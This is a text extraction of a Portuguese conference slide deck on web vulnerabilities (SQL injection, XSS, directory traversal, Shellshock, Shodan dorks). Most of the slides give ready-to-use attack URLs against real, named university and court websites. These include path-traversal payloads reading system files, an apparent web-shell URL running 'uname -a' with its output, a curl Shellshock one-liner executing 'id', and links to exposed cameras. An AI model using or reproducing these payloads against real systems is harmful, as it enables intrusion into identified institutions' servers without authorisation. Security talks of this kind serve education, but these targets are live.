Roadsec_Manaus-Vulnerabilidades WEB.pptx

Esta é uma pré-visualização de arquivo. Entre para ver o arquivo original

O MAIOR EVENTO BRASILEIRO DE HACKING, SEGURANÇA E TECNOLOGIA
Vulnerabilidades WEB – Sua aplicação é segura?
Edvan Oliveira (Eddy Oliveira)
Parceiro
‹#›
ROADSECAM – 25% 10/05
http://securityattack.com.br
https://blackdoorsec.com
‹#›
‹#›
Vulnerabilidades Web
Sql Injection http://www.fucapi.br/seloamazonico/ver_noticia.php?sid=21
XSS
Privilege Escalation
Arbitrary File Download
Directory Transversal
ShellShock
Outras...
‹#›
Zimbra
Exploit-DB
http://exploit-db.com
Inurl
Ifam.edu.br
EXPLOIT!
‹#›
Privilege Escalation
http://linguajaponesa.ufam.edu.br/wp-admin/
Tiosam
Tiosam 
‹#›
Directory Transversal & Arbitrary File Download
http://lecionar.uninorte.com.br/exibir.php?mod=../../../../../../../../../../../../../../etc/issue%00
http://lecionar.uninorte.com.br/exibir.php?mod=../../../../../../../../../../../../../../etc/network/interfaces%00
https://sicanet.uninorte.com.br/institucional/documentos/sicanet.institucional.visualizar.documentos.php?arquivo=../../../sicanet.index.php
‹#›
ShellShock
http://tjdf04.tjdft.jus.br/cgi-bin/tjcgi1?NXTPGM=LCHTSF02
http://tjdf19.tjdft.jus.br/docs/erro.php?cmd=uname%20-a
uid=48(apache) gid=48(apache) groups=48(apache)
Linux tjdf95.tjdft.jus.br 2.6.9-55.ELlargesmp #1 SMP Fri Apr 20 16:46:56 EDT 2007 x86_64 x86_64 x86_64 GNU/Linux
http://difusor1.fae.ufmg.br
curl -v http://difusor1.fae.ufmg.br/ -H "custom:() { ignored; }; echo Content-Type: text/html; echo ; /usr/bin/id" | grep uid | cut -f 1
‹#›
SHODAN + Google Dork
http://www.shodanhq.com/
http://cyclops.sunderland.ac.uk/view/index.shtml
http://198.82.159.136/view/viewer_index.shtml?id=2572
‹#›
DDOS
BOTNET
Indisponibilidade!
‹#›
Obrigado!
Site: http://securityattack.com.br
https://blackdoorsec.com
E-mail: eddyoliveira@bds3c.com
Skype: conexao.finalizada
Facebook: eddy.ogomes